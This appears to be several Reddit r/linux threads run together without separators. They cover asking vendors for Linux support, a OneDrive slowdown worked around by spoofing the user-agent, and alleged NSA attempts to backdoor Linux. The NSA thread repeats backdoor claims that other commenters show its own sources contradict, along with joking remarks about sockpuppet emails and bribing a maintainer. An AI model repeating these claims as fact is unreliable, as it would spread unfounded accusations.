Recent  example: I really wanted an Elgato Streamdeck but Linux is a no go.  Found a competitor called Loupedeck and sent them an email, and they let  me know they've gotten a lot of Linux requests recently so they sent it  over to their Software Director... enough people asking puts Linux support on the map!

https://preview.redd.it/dhbb0k0z2so71.png?width=2125&format=png&auto=webp&v=enabled&s=b65c90f12c53dcddecf6c278cd43d550e7acc0fa
Adobe will not like it
Autoreply: "Sorry we don't support Linux, but we hear it runs great with WINE"
Fwiw, the elgato stream deck works on Linux. There's open source tools to use it
There is a point here: Linux usage is not detectable in same way as, say Windows, and realization how many customers there are for a product is not obvious.

For example, browsers can mask OS from identification string: they do that when websites make bad assumptions based on browsers. This can cause misleading statistics about "desktop OS" usages and so on.

Linux is often installed after purchasing a computer: there are manufacturers that offer it directly pre-installed but all don't (yet). This can cause misleading statistics of total installed base.

Also there are no simple statistics how many people have certain open-source software installed. For that reason there is no statistics of how many people would be interested in related hardware that could be used with it.

So people making hardware/software might not have correct assumption of how wide potential customer base there is.

And if you do want to have companies support Linux: purchasing hardware or software will make companies interested in offering things.
Every time I've tried that I've gotten a nasty response back.

Looking at the folks over at RT Systems. Their stuff is even written in Java, and runs on both Mac and Linux.

Doesn'tn't work in WINE because of needing hardware calls to work cleanly, to their brand USB/serial adapters.

Email came back, "we never have, and we never will, support Linux."

I took my business elsewhere.
An actual reply:

```
Hi RoboticElfJedi,

Currently we don't support Linux.  I will try Ubuntu when able.

Regards,

The vendor
```
I've never thought of this 🤦🏾‍♂️
I'm gonna start doing that. It doesn't hurt to do so. What's the worst gonna happen? They say no and apologize.
The company I work for is working hard right now to support our product on Linux. It’s part of the list of tasks on my plate currently :)
It never hurts to send an email. I do it every now and then when I run across a neat audio plugin that's win/mac only. Yes, I'm aware of WINE. 

For the Elgato Streamdeck look into Bitfocus Companion. I use it to control the Deck in the studio.
I completely agree with your prescription. People should provide feedback about these kinds of things. 

However, in the meantime: have you considered a QMK keyboard as a macro pad? It's more DIY solution, but has infinite flexibility. I'm considering buying a prebuilt for this purpose, and other than having fancy displays on the keys, I can't think of anything I'd lose with QMK.
With Loupedeck specifically it might be useful to mention the Steam Deck, since the Deck likely means more streamers will come to Linux. Stream deck software would be a nice thing to have for those streaming on their Steam Deck.
Tell that to Sony and their PlayStation 3 engineers.
Tell that to Adobe…
Let's do this for SteelSeries software, If they get 300+ emails they will start to consider it...
I really miss the SteelSeries app in there...
Meanwhile I can't even mention Linux outside the designated areas without being bombed with downvotes
>product you want doesn't support Linux

Oxymoron
Suomi mainittu lol
I managed to get a Bluetooth that "wasn't comparable with Linux" to work with linux
I'm currently reproductive organs deep into trying to get a HDMI passthru capture card working on Linux. I'm going to kindly ask the company for some hints and will respond back with my finding.
I just sent a similar message to ask Chuwi to release linux driver for audio chipset on their GemiBook Pro.
I will try this regarding Lenovo Legion 5 with amd CPUs. Appreciate the advice!
Maybe this will work? https://timothycrosley.github.io/streamdeck-ui/
Get modern WordPerfect on Linux and I'll buy you a car.
The products I want are games but hoping with Steam Deck that will change. But I will go right now and send a email for one of the only games I really play and see what happens
That's a great idea, I honestly never gave it that much thought that simply asking about it might at least make them consider to add the support.  Probably more true for smaller and lesser known brands.  The big ones will probably tend to be set in their ways and not care.
definitely DON'T make dozens of fake email addresses and send emails from each address, and definitely don't space them out sporadically so as to make it seem like there has been a spike in interest
garbage in garbage out
If you're having to ask for support, then it sounds like it's proprietary or has proprietary dependencies. Getting more companies releasing their proprietary drivers and apps for Linux feels like progress but is actually a setback. I want more hardware to work, but not if it means having to trust a binary or being forced into ubuntu because the community lacks the tools/info necessary to build it for other distros.
I sent a email to lobe.ai , it was needed for my college , but they did not support Linux
Hehe, try it with garmin...
El Gato... You hear this?
NI (Native Instruments, the creators of Kontakt) have received a lot of linux requests over many years, to which the answer has always been  the corporate wall of silence, i.e. NO.
At this point, I would be fine with just an Electron port and a Debian repo hosted by the vendor.
Adobe: ...
Ah here you'd get writers cramp lol
Also you can build your own with QMK. It's a good intro to microcontrollers. 

https://sparkglug.co.uk/blog/arduino/firmware/hardware/streaming/custom-streamdeck-3-the-first-prototype/
I did the same with 1Password. Two months later I saw it being bundled into multiple packages.
eh i mean if it is free software it is on linux anyway
Likely because of the Steam Deck.
Suomi mainittu torilla tavataan
Suomi mainittu torille!!!
I'm betting 90%  or more of companies won't bother supporting Linux because of its  low market share compared to Windows.
I don't think apple will like that for my iphone
I read that as "Steamdeck" at first and got confused.
I keep writing to toastmaster but my toaster still won't run Linux. NetBSD, on the other hand...
Honestly if I could run iTunes natively on Linux I would probably switch my laptop over to it full time.
Yes Adobe and AutoDesk, we are looking at you both.
Not in this case for [Logitech](https://support.logi.com/hc/en-us/community/posts/360032500413-Logitech-Options-for-Linux)! haha

I commented once on this, and from time to time, I see an update.
So nvidia, f*** you
Don't worry, I hear next year will be the year for Linux on the desktop.
Hell, if vendors would even just provide register docs, the community could take care of the rest.
Good luck getting Microsoft to make Access work on Linux
Ive emailed Adobe over 1 million times where is my response liar
Just run it in Wine, don't bother asking for native support.
Or better yet, don't buy from them (if possible).
How many emails where sent to Adobe about it? XD
For a few weeks I have Linux Mint 18.1 installed on my laptop. I am still in school and started a new project. With that project we use onedrive on a Office 365 platform. On my laptop I use the latest Firefox 52 browser and strictly work in Word online since document compatibilty is always an issue while working in a team.

Sadly enough I experienced a lot of performance issues while browsing the directory and working on a document. As I also have a desktop running Windows 10 and the same Firefox 52 browser I tried working on that and see if the problem persists. But no. The problem was no more. 

Then I began thinking and trying a few different things. On of the first ideas I came up with was changing the user-agent string. I changed the user-agent string to the following.

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/52

I the following extension in Firefox to change it.

https://addons.mozilla.org/nl/firefox/addon/modify-headers/developers

After changing the user-agent the performance problems were resolved. The UI of OneDrive worked flawlessly. The only thing in the user-agent changed was the OS. At first I thought this was a random occurance but no. I changed back to the normal user-agent and the problem came back. 

My friend who also had this problem used the same method as I did with the same results. 

So by writing this I hope to get to know if people also have this issue.

**[NEW DEVELOPMENT]**

So my friend pointed out that he had no problems with Onedrive for Business anymore. I changed my own user-agent back to normal. And the problem was resolved at my end as well. 

It turns out that a member of the Onedrive team spotted that there was this particular issue. Check out the first comment

https://news.ycombinator.com/item?id=13932226
Before raising your pitchforks, please see more in-depth investigation done by /u/angellus here:

https://www.reddit.com/r/linux/comments/60nj67/office_365_onedrive_looks_at_useragent_to/df7wnk1/
I just tried this same thing--changing the OS in the user agent--on Chome on Linux. The difference really is incredible. Normally I find 365 to be so slow as to be borderline unusable, now it's almost as quick as Google docs. Even the institutional log-ins for my university are faster.

EDIT: Just to clarify, I was testing specifically the web apps for Word and OneNote hosted by my uni. I tried loading them both in normal tabs and ones where I had changed the OS useragent in Chrome's developer panel. The normal tabs hung badly as usual (30+ seconds to load the UI), while the modified tabs loaded very quickly. I tried this several times, but I suppose YMMV.
Thank you for this tip! I've found my OneDrive experience to be completely unusable (Chromium 53 on Linux Mint 17.2/18.1). But this is really amazing -- now I can finally utilize my 1 TB of space (via my university).
There is good chance they have some optimizations for Firefox in place that are just not used when agent reports "unknown" OS. Not including Linux in list of know OSes is, of course, just "random mistake" :)

What agent are you using normally?
This is certainly a bug. It is **not** a targeted attacked against Linux users. Report it to Microsoft. 

Microsoft is just doing really shitty feature detection using User Agent strings instead of, well actual feature detection. I was able to reproduce the same result by setting my User Agent to Firefox 52 on Windows 98. If I set it to a "more realistic" user agent like IE 7 on Windows XP, it would actually redirect me to a busted page to upgrade my browser instead of Word Online. It appears if Microsoft cannot figure out your User Agent (including your OS as part of it), it gives you a busted experience. 
Good observation! I wonder if there's a way to archive & reverse-engineer the JS to see why this is happening; not that I am capable of such a thing, just curious.
For those saying that OP should have made a bug report, this was reported to them at least back in November (I haven't dug any deeper to see if there was an earlier report) and their response was that it is not supported on Linux:

https://answers.microsoft.com/en-us/msoffice/forum/msoffice_onedrivefb-mso_o365brs/onedrive-for-business-open-is-very-slow-on-linux/3d33dc1b-3cc3-4c24-9998-9ab96bad31fc
Those pieces of shit. I had to migrate my mother to Linux because of Microsoft pulling stuff like this and her PC being quite weak. She's had to use Office online though, and I thought it was just an issue with the service being generally bad. 
[deleted]
Color me not surprised that MS would do something  like that.
Ballmer called Linux a cance, he had it wrong, MS is the cancer and oh so malignant.
Hold on: Is it only OneDrive - or rather its use with Office online - that is affected by this, and so not Office online used *without* OneDrive?
This is a useful (thank you!) but depressing tip.
Hey all, we just posted this in a thread on HN and another Reddit thread, but since this post has a lot of discussion, I wanted to make sure it's here too. 

Hi everyone, this is Can from the OneDrive team. We know that some users may have experienced difficulty accessing OneDrive for Business on Linux. The issue was resolved as of Tue, March 22nd 3pm PST. 
 
We identified that StaticLoad.aspx, a page that prefetches resources in the background for Office Online apps was using the link prefetching browser mechanism only for certain platforms (iOS, Chrome OS, Mac, Windows), but for Linux it was falling back to a less efficient technique that was causing the issue. Rest assured that this was not intentional. It was an oversight.  

The prefetching optimization was disabled, and it will be enabled again soon after an update for StaticLoad.aspx has been tested and released on Linux. 
 
We apologize for the inconvenience this may have caused.

Faking poor performance on Linux is a new low for Microsoft.
Likewise, unless I change the user agent to Firefox for Windows, I get the basic HTML Microsoft exchange webmail. It's borderline useless without spoofing the agent.

[Sniffing user agents has got to stop](http://www.growingwiththeweb.com/2014/04/get-your-nose-out-of-my-user-agent.html). It's a bad hack.
Seriously: Fuck Microsoft and their FUCKING SHITTY ONE DRIVE!!!
I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit:

- [/r/realtech] [X-POST - Office 365 Onedrive looks at user-agent to determine performance](https://np.reddit.com/r/realtech/comments/60o06b/xpost_office_365_onedrive_looks_at_useragent_to/)

- [/r/stallmanwasright] [Office 365 Onedrive looks at user-agent to determine performance. • r\/linux](https://np.reddit.com/r/StallmanWasRight/comments/60qlpy/office_365_onedrive_looks_at_useragent_to/)

- [/r/technology] [X-POST - Office 365 Onedrive looks at user-agent to determine performance](https://np.reddit.com/r/technology/comments/60nz2e/xpost_office_365_onedrive_looks_at_useragent_to/)

[](#footer)*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))*

[](#bot)
Such is politic of microsoft. If I remember correctly skype for web works on windows, but dont work on linux, though all soft is the same, you do not need even flash for that, only browser with js, yet linux is "not supported".
I wonder if someone on a Win10 machine were to change their user string to spoof a Linux environment, if they'd get the bad performance...
This is  not a business decision. Why would they deliberately block 1% of their users. It's a bad useragent feature detection, yes
Microsoft supports OneDrive on Android which is Linux.
Did you try with Android in the User agent?
Are you sure its not a comparability issue (ie having to load more js/applets to ensure the same environment?

User Agent isn't to slow you down, but so the server knows what you can do without wasting time probing.  If you ever did front end when Netscape and IE were just out almost ever thing you did needed to be probed because they simply didn't behave the same way.
I knew it, those fuckers 
Free booze and hookers if you visit the Microsoft store. Only with Edge.
Eli5?
Can you post what you changed it from and to please 
Interesting, I was using Onedrive today in my browser and it was so slow that I ended up using  a windows 7 VM to counter it. I'll try this instead.
I don't have that problem with Libre Office and my local NFS shares. :P 
We started using Microsoft Teams at work. Aside from generally being a steaming pile of crap, it won't run at all on Linux, instead redirecting you immediately to download the desktop client (which obviously doesn't exist). I have to use a user-agent switcher to go to the site. 
report it as bug to mozilla. it would be hilarious if they added a "fix" for it. there is nothing microsoft could do about it except admitting being assholes. but i doubt mozilla has the balls.
Riiight, sure, a bug, if you belive that you are crazy. This is MS, they probably put in that 'bug' intentionately so when it is discovered they can say - oh, sorry, bugs happen, blabla...
Better then being caught without a decent excuse and to admit (again) you tried to stiffle competition on purpose!
Funny but no matter if it was targeted against linux users or just badly implemented - Windows can and shall do better!

But humans love the common sense and because so many use Windows why not use it; it is also a Linux by now, isn't it? ;)

Raise yur pitchforks crowd!
Microsoft product is shit, what's new?
Thank's for pointing this out!
I find Office 365 literally unusable in Chrome on Ubuntu. I have to fire up Firefox, do whatever I need to do in Office 365 (usually convert an office doc or pptx to PDF), and then finally view the document. I'll have to try the user agent switch the next time a professor distributes a pptx.
You posted a link to the Dutch firefox add-ons page. Here's the same page in the queen's english:

https://addons.mozilla.org/en-GB/firefox/addon/modify-headers/developers


Shame it doesn't fix the annoying "Retrieving data. Wait a few seconds and try to cut or copy again."
I made a guide to share around the office (We're mostly a linux shop here..) Might help some of you guys!

---

# Using Office365 (on anything but windows)

Due to a [bug](https://www.reddit.com/r/linux/comments/60nj67/office_365_onedrive_looks_at_useragent_to/df7wnk1/) with Office365, It is required to spoof a Windows Operating System User Agent String in order to use the website without crippling lag.

Since I use Google Chrome, and don't want to run any weird plugins, this guide will advise using FireFox for the purposes of accessing Office365.

1) Download & Install [Firefox](https://www.mozilla.org/en-US/firefox/new/)

2) Add the [Modify Headers Add-on](https://addons.mozilla.org/en-GB/firefox/addon/modify-headers/developers)

3) Restart Firefox (you should get a prompt)

4) Click the new "Modify Headers" button (should be near the "Home" button)

5) Under the "Headers" tab:

  - _Select action_: `Modify`
  - _Header name_: `user-agent`
  - _Header value_: `Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/52`
  - click _Add_

6) Go back to [Office 365](https://outlook.office.com/owa/), refresh, and enjoy!

I had this same problem on khanacademy and changing the user agent seem to have solved the issue there as well(just adding to the thread if others experience this same problem on khanacademy).
But guys, Microsoft LOOOOOOVES Linux!
[deleted]
That reminds me of a similar situation with Google Docs and Firefox some time ago, https://bugzilla.mozilla.org/show_bug.cgi?id=1307024.
There's no way this isn't intentional. 
This is not new actually, it's been going on cca forever.
I for one am emailling FSF. Thank you for your diligence in digging into this.
As some of may know already, rumors of NSA backdoors in windows and mac have been running around in tech and hacking circles since the 90's. The first alleged attempt was in 2003 and is documented here http://freedom-to-tinker.com/2013/10/09/the-linux-backdoor-attempt-of-2003/

Another suspected attempted was from code planted in openssl software in Debian, which serves as a upstream for most Linux distros that is documented here: https://freedom-to-tinker.com/2013/09/20/software-transparency-debian-openssl-bug/

A third attempt came to light in 2013 when Linus Torvald's father came forward and said the NSA had approached Linus directly documented here http://www.omgubuntu.co.uk/2013/11/nsa-ask-linus-torvalds-include-backdoors-linux-father-says-yes

This was later confirmed by Linus himself in a tongue in check manner documented here http://www.theregister.co.uk/2013/09/19/linux_backdoor_intrigue/

Now this would sound like paranoia, but I recommend reading this as well, a report in the new yorker about edward snowden on the NSA's capabilities http://www.newyorker.com/tech/elements/how-the-n-s-a-cracked-the-web

stay tinfoiled friends.

That we know of. Could be 30 times.
Ever since i heard about Intel Active Management Technology (AMT) and AMD's alternative, i wonder why would NSA even bother with backdoors now. Most of us already have a backdoor up and running.
You're counting known failiures not attempts
Oh I am pretty sure that there are plenty of documented 0days to go around that make backdooring possible.

Some programmer once demonstrated OTR a 0day by exploiting *multiple* font vulnerabilities by which he could use RCE to dig in, regardless of operating system. I am fairly certain it has not been fixed yet. 


> Another suspected attempted was from code planted in openssl software in debian, which serves as a upstream for most linux distros that is documented here https://freedom-to-tinker.com/2013/09/20/software-transparency-debian-openssl-bug/

That was never intentional. If it had been, the Debian package maintainer in question wouldn't have gotten into contact with OpenSSL upstream to have his patch reviewed prior merging it.

The bug came into existence because the package maintainer addressed some *valgrind* warnings and hence wanted to improve the quality of the code. What he didn't know is the fact that the uninitialized memory was necessary for OpenSSL to generate entropy.
The first one you list says in the first line that it probably wasn't the NSA.

The second one makes one reference to NSA, that being it says the person who introduced it *was not from the NSA*

Third one is completely valid. EDIT: WAIT NO. It says Linus himself says it never actually happened.

What the hell, man? This is entirely tinfoil hat paranoia.
If you believe the NSA tried to backdoor Linux, then you can be sure that Windows and OSX have backdoors. Whether these are unpatched 0days (whether the vendor knows about them or not) or actual intentional malicious code, they're probably in there.
First link:

> Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. 

Second link:

> So was this problem a backdoor, purposefully introduced? It seems unlikely. 

Third link:

> Linus went on to insist that he was joking, and that the NSA had not approached him.

> If any holes were left around for the NSA’s overly-long tentacles to creep into, you can bet your bottom dollar that they’d have been found, exposed and rooted out long before now.

Well, I'm convinced!


If your hard drive crashes or you loose your data and can't recover go to NSA they might be having some backups of your hard drive
your link on Debian openssl....

>So was this problem a backdoor, purposefully introduced? It seems unlikely. The maintainer who made the change, Kurt Roeckx, was later made Secretary of the Debian Project, suggesting that he’s a real and trustworthy person and probably not a fake identity made up by the NSA to insert a vulnerability. 
s/tongue and check/tongue in cheek/
They only had to backdoor windows once
When the question is first asked, look at the face Linus makes. 
> "Oh, Christ. It was obviously a joke, no government agency has ever asked me for a backdoor in Linux," Torvalds told Mashable via email. "Really. Cross my heart and hope to die, really."

http://mashable.com/2013/09/19/linus-torvalds-backdoor-linux/#4qoU_sre2sqQ



I have always found those binary blobs to be mighty suspicious. Especially since so many of them are related to networking and usb.
Ah the NSA making everything less secure by not disclosing vulnerabilities and trying to keep them for themselves 
>stay tinfoiled friends.

The NSA already made Reynolds Wrap® install backdoors in their aluminum foil products. 
It seems like [backdooring hard drives](http://spritesmods.com/?art=hddhack) is the most logical, and efficient universal attack vector.  Think about it, there are relatively few manufacturers, and they are in almost every computer on Earth.  So while backdooring CPUs may be tempting, there are so many more permutations, with so many more opportunities to scrutinize its operations, and outputs.  A hard drive, on the other hand, just sits there doing its thing, storing and retrieving what the NSA is ultimately after. 


Is ubuntu safe?
Wow. Omgbuntu is playing clickbait games with its URLs.

The URL: http://www.omgubuntu.co.uk/2013/11/nsa-ask-linus-torvalds-include-backdoors-linux-father-says-yes

The actual headline from the page: NSA Wanted Backdoor Access In Linux, Says Linus Torvalds’ Father

And nowhere in the article does it say Linus said "yes"...heck, the word "yes" does not appear on the page.
Reading this troubles me. As a Windows user, should I just expect that my computer can be the NSA's bitch whenever they feel the need? And that perhaps the NSA's ability to do whatever they want to my machine might even be coded as a feature for them in the OS?
One person, with no connection to the Debian project and without doing any research whatsoever, speculated that the Debian OpenSSL bug *might* have been an NSA attack. I would agree that the NSA may attempt a vector much like the Debian OpenSSL bug, but the suggestion that this actually happened in that specific case is ludicrous.
Now, one could ask how [NSA and Android collaborate](http://www.androidcentral.com/nsa-contributes-android-there-no-secret-backdoor).

Think patterns. Nothing hidden.
[deleted]
Only 3? 
Bugdoor > backdoor. Why go to the trouble of sneaking in a backdoor, when you can just find preexisting vulnerabilities in the code base.
Someone should make a new sub just for tin foil hat linux 
Only 3 times? Wishful thinking :D
number is far too low. 

How much does it cost them to pay some devs to commit code changes? I would expect their attempts to be in the hundreds.
Let me get this straight :  my windows install is backdoored
My linux instals are backdoored
My phone probably is as well
FUCK THE NSA THOSE SONS OF BITCGES
Sad, I think I would trust a Russian or Chinese OS more than I trust an American OS.

Only 3?
The whole world could do with the USA having another revolution. Or at least a Libertarian president to refund the NSA etcetera. Anything other than this decline to tyranny.
'only three?'
RUN. TO. THE. HILLS! 
All that the Snowden documents show is how incompetent the NSA is.
Why bother with the OS when you can access everything directly from the CPU? 

http://www.eteknix.com/expert-says-nsa-have-backdoors-built-into-intel-and-amd-processors/
As a long-time Debian developer, I just want to say that there is really no need for the NSA to go through all these difficult contortions. I maintain a few low-profile but oft-used libraries. And make no mistake, I do have principles. But they are for sale.

I won't insult them by telling them to PM me for my truename and email. Just get in touch, okay?
It would be worrying if they *hadn't* ;-)
I wonder what other government agencies(from any country) have tried too. And also what chinas distro has...

Do people go over linux has hard core as some bss projects?
I always wonder how many double agents the NSA has working on Linux.  Luckily we can see the code, unless you're using proprietary drivers.  That doesn't even include the problem of closed source BIOS, hard drive firmware, wireless drivers, etc. etc.
If Linux is compromized, then we really can't have nice things.
Videos in this thread:

[Watch Playlist &#9654;](http://subtletv.com/_r54in5s?feature=playlist&nline=1)

	VIDEO|COMMENT
	-|-
[LinuxCon & CloudOpen North America 2013 - Linux Kernel Panel](https://youtube.com/watch?v=84Sx0E13gAo)|[3](https://reddit.com/r/linux/comments/54in5s/_/d82ic11?context=10#d82ic11) - He actually meant the fourth link. Here you go mate.   
[Spaceballs : We Ain't Found Shit](https://youtube.com/watch?v=g3iFJpGJiug)|[3](https://reddit.com/r/linux/comments/54in5s/_/d82lq5r?context=10#d82lq5r) - camera pulls back to two black guys dragging a massive pick through the sand. Edited: heres the video since some of you may have not seen it.  
[Linus Torvalds - Backdoor In Linux](https://youtube.com/watch?v=7gRsgkdfYJ8)|[3](https://reddit.com/r/linux/comments/54in5s/_/d82i5dy?context=10#d82i5dy) -  
[Do We Have Free Will?](https://youtube.com/watch?v=EjMyZbsRpqQ&t=40s)|[1](https://reddit.com/r/linux/comments/54in5s/_/d831a4r?context=10#d831a4r) - Why don't you fucking FLOSH? 
[Linus Torvalds was approached by NSA for backdoor in Linux - Nils Torvalds (father of Linus)](https://youtube.com/watch?v=wwRYyWn7BEo&t=115s)|[0](https://reddit.com/r/linux/comments/54in5s/_/d82wqbt?context=10#d82wqbt) - Judging by the video it seems like his father is pretty convinced. Who knows.    
[NSA operation ORCHESTRA: Annual Status Report](https://youtube.com/watch?v=fwcl17Q0bpk)|[0](https://reddit.com/r/linux/comments/54in5s/_/d82grv8?context=10#d82grv8) - Wouldn't the NSA be neglecting to do their job if they did not at least try to backdoor/gain access to popular operating systems?    
I'm a bot working hard to help Redditors find related videos to watch.
***
[Play All](http://subtletv.com/_r54in5s?feature=playlist&ftrlnk=1) | [Info](https://np.reddit.com/r/SubtleTV/wiki/mentioned_videos) | Get it on [Chrome](https://chrome.google.com/webstore/detail/mentioned-videos-for-redd/fiimkmdalmgffhibfdjnhljpnigcmohf) / [Firefox](https://addons.mozilla.org/en-US/firefox/addon/mentioned-videos-for-reddit)
>If any holes were left around for the NSA’s overly-long tentacles to creep into, you can bet your bottom dollar that they’d have been found, exposed and rooted out long before now.

One can hope
And that's just one agency.

If you consider the value gained by a state actor for having a remote backdoor into every linux system, and the modest costs involved with hiring programmers to work on linux for he sole purpose of gaining a reputation with the community...

Maybe all *linux* contributors are all state actors trying to slip patch vulnerabilities past each other.
Tails it is then!

I know its 2012 but as i understand it they were having difficulty getting into it! http://www.computerworld.com/article/2863937/snowden-docs-show-tor-truecrypt-tails-topped-nsas-most-wanted-list-in-12.html 
Snaps and flatpacks are the real risks
and im sure they've succeeded at some point. I mean with an unlimited black budget and such relentless it pretty much that if youre hiding from the NSA than you are likely better off using more primitive means of concealing
Euphemism and litteral apply in the same title.  Nice.
Yet they use it on their own servers :|
That first one sounds like conspiracy theory bs to me. Not putting == instead of = is an easy mistake to make. Somebody should have caught it in lint.

Besides, simply running seteuid(0) doesn't promote your effective userid to root. It doesn't work that way. From the seteuid manpage:

If the user is root or the program is set-user-ID-root, special care must be taken.  The setuid() function checks the effective user ID of the caller and if it is the superuser, all process-related user ID's are set to uid.  After this has occurred, it is impossible for the program to regain root privileges.

Meanwhile the last dude to commit a terror attack in the US has been posting about it on tumblr for weeks before the shooting being completely unnoticed. But hey better use the nsa to get a commercial edge over the EU when dealing with the east and middle east! 
> When my oldest son [Linus Torvalds] was asked the same question: “Has he been approached by the NSA about backdoors?” he said “No”, but at the same time he nodded. Then he was sort of in the legal free. He had given the right answer …everybody understood that the NSA had approached him.

Why didn't he just outright say yes? He wouldn't have signed any agreement with them forbidding him from telling people.
The title should be "The NSA failed 3 times to back door Linux, but how many times did they succeed?"
They have been successful at least once. Anything using the NIST random number generator is compromised.
Three.

*snicker*
pretty sure redhat has more than 3 projects.... /s
>Now this would sound like paranoia

Yes, of course. But the thing about that is, if you're not paranoid, you haven't been paying attention.
This is so much more concerning than it looks. I'm an American, which means theres a big social taboo against saying this, but can all you other world powers please do some things to shut this kind of shit down? The USA Federal Government is a serious threat to everyone, and the only power whose alliance it seems to want anymore, is Russia. 
deleted  ^^^^^^^^^^^^^^^^0.0516  [^^^What ^^^is ^^^this?](https://pastebin.com/FcrFs94k/60576)
I got downvoted Just for theorizing about this.
I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit:

- [/r/linuxcirclejerk] [TIL NSA has tried to backdoor Linux three times.](https://np.reddit.com/r/LinuxCirclejerk/comments/54ojax/til_nsa_has_tried_to_backdoor_linux_three_times/)

- [/r/snowden] [The NSA has tried to backdoor linux three times • \/r\/linux](https://np.reddit.com/r/snowden/comments/54jk18/the_nsa_has_tried_to_backdoor_linux_three_times/)

- [/r/stallmanwasright] [The NSA has tried to backdoor linux three times](https://np.reddit.com/r/StallmanWasRight/comments/54qk0f/the_nsa_has_tried_to_backdoor_linux_three_times/)

[](#footer)*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))*

[](#bot)
Isn't it great that, if you want to know anything about the most secretive agency in the world, redditors know and no one else does.
Why wouldn't they?

I imagine every government with competent intelligence agencies has done the same. 

Who knows if they succeeded.  It's not like they'd announce it.

Nor would anyone have any real interest in backdooring Linux across the board.  They'd want to use that capability on specific targets.  Devs may look at source and understand it, but very few users ever do that.

Ubuntu is awesome, it provides an easy and well known entry point for people to use Linux, and helps bring Linux into business.

CentOS and RHEL are big driving forces behind Linux use in servers, and supports the secure and stable internet we have today.

Manjaro and PopOS provide good platforms for first time Linux users at home, and have helped Linux gaming adoption and support.

Arch provides incredible community resources like the Arch Wiki, and allows people to start tinkering with Linux in deeper ways without having a huge barrier to entry.

Gentoo provides an incredible platform on which users can build what they want from the ground up, and provides fantastic in-depth community resources in the process.

And all the other distros I can't spend 2 hours naming, are all awesome, with collective communities that do amazing work.

Use the distro you want, and have fun.

Just because someone uses Ubuntu certainly doesn't mean they're "Not a real Linux user", and just because someone uses Arch doesn't mean they're snobbish, nor does it give anyone the right to be.

Love you all ❤️
No Fedora :(
This is the most wholesome post about Linux I ever seen.
But then again, you could also say that every distro sucks, each in its own special way :)


> Use the distro you want, and have fun.


Indeed, that's the most important thing!
Yes, Linux developers, distro maintainers and regular community are amazing and I am thankful to their work.   

I use Fedora as daily driver, almost bleeding edge yet rock solid, for my newest MSI GE-66 Raider too. But I used Ubuntu, Debian, Suse, Arch many more in my secondary laptop too.
Every distro is awesome except for the one I've been using for the last six months. It's just so boring.
BTW I use Mint but how about "*Hanna Montana*"? :)
NixOS - write once run anywhere with the same configuration
I’ve been using Linux since before Ubuntu existed and I have Ubuntu with Gnome 3 on my daily driver.
All distros are fine.
I use arch btw, but seriously I've enjoyed every other distro I've tried
No debian :(
...And Hannah Montana OS has given us humility and perspective in today's fast paced world.
openSUSE + btrfs + snapper + rollling + yast2 FTW
[removed]
Except Amazon Linux
Impossible, where are my posts about how redhat is evil and systemd is bloatware?!?
I think every Distro has its purpose(maybe except for the celebrity ones like Hanna Montana) and just like with human race you shouldn't judge people on what Distro they use
> Every Distro is Awesome 

Nope, some distributions should be avoided at all cost, regardless of your Linux related skills.
[deleted]
Good job trying to incorporate all the major distros into one post with brief summaries, nice to see some warmth in the community. More people should take this to heart and stop bashing on one another for using one or the other distro we are all on the same team.

&#x200B;

P.S. I am a little salty SUSE didnt make the list ;)
Thanks all distro for leran me Linux 
Thanks Linux mint for beginning all of my Aventure
i miss MEPIS
Yup, I wholeheartedly agree :)

One time, me and few friends were debating our Linux distro choices. Then one Windows-user started trash-talking about how all Linux users fight all the time. He was promptly corrected: "we respect our choices, only discuss different points of view".

There are some immature users who cannot understand, that other people might have different needs, but at large I think the Linux community is past that.
Glad someone else knows of PopOS. System 76 is awesome.
> Ubuntu is awesome, it provides an easy and well known entry point for people to use Linux, and helps bring Linux into business.

The major advantage of Ubuntu is that you can set your watch after their release schedule and release model. You can set up a system, deploy to 1000 machines and set a calendar event for 4 years into the future for you'll need to start the system update testing process. After a few weeks/months of testing you redeploy/upgrade/re-install and you're set for another 4 years.

Once a setup is validated as known and working you can just re-use that image/template for everything and expect same behavior everywhere with no surprises.
Counter point: distributions cause too much fragmentation, we don't need over a hundred distros.
Even hannah montana linux?
> gentoo provides an incredible platform which users can completely mangle by typing *emerge world* into the console just once
I use Ubuntu simply because there are many PPAs out there that can ease my life.
Linux Mint is not there and I am sad.
I don't mean to be that guy, [but not ALL distros are awesome...](https://twitter.com/campuscodi/status/1196936416040833024?s=20)
I use Linux Mint. I believe Mint users aren't allowed on the Linux Discord, or at least you're not allowed to talk about it. It kinda sucks, I feel ashamed just because of my distro. I don't even use a DE like Cinnamon, I use Awesome window manager (and I love it). Even then, Cinnamon is stable and easy to use. And if you're gonna use the "no snap packages allowed" argument, it's pretty easy to enable them again.
Yeah they are :) Only beginners and fanboys believe that distros like Ubuntu and Fedora are only for beginners. I would bet there are more beginners on Arch than there are anywhere else, and for good reason. Beginners need thorough documentation and no team has a better wiki than Arch, that is why it is a really great beginner-friendly distro and also an excellent distro for any user. But users who are actually comfortable on Linux and don’t need a guide to use it will choose whichever distro works best for the purpose and it could be any of the actively maintained projects.
mate, thank you. this post is really good.
what about redhat though?
Linux is life.. How does that sound when you know majority of the internet and innovations were done using Unix and Linux. How many average people know Apple is heavily customized Unix.
Well said. Side note, our usernames are _far_ too similar.  Had to double take.
Every distro has its place and purpose. Some do it better than others but to each their own.
Are you challenging me to make a distro that truly sucks?
Mint is also amazing for first time users. Used Ubuntu for the first time and couldn't figure a lot of things. Used Mint and have never looked back.
Every distro is awesome... except Snabuntu.
You missed Sailfish OS and Ubuntu touch!
You bring up CentOS and RHEL but not Fedora?  Get yourself a VM of it tonight.  It's the ultimate workstation distro.

Great writeup.
...Are you sure about that?

[http://hannahmontana.sourceforge.net/](http://hannahmontana.sourceforge.net/)
Distros are like women. They're all beautiful in their own way.
What about red star os?
They are all great. I use arch btw
I use Mint and it's very cool!
Kubuntu 20.10 here :P
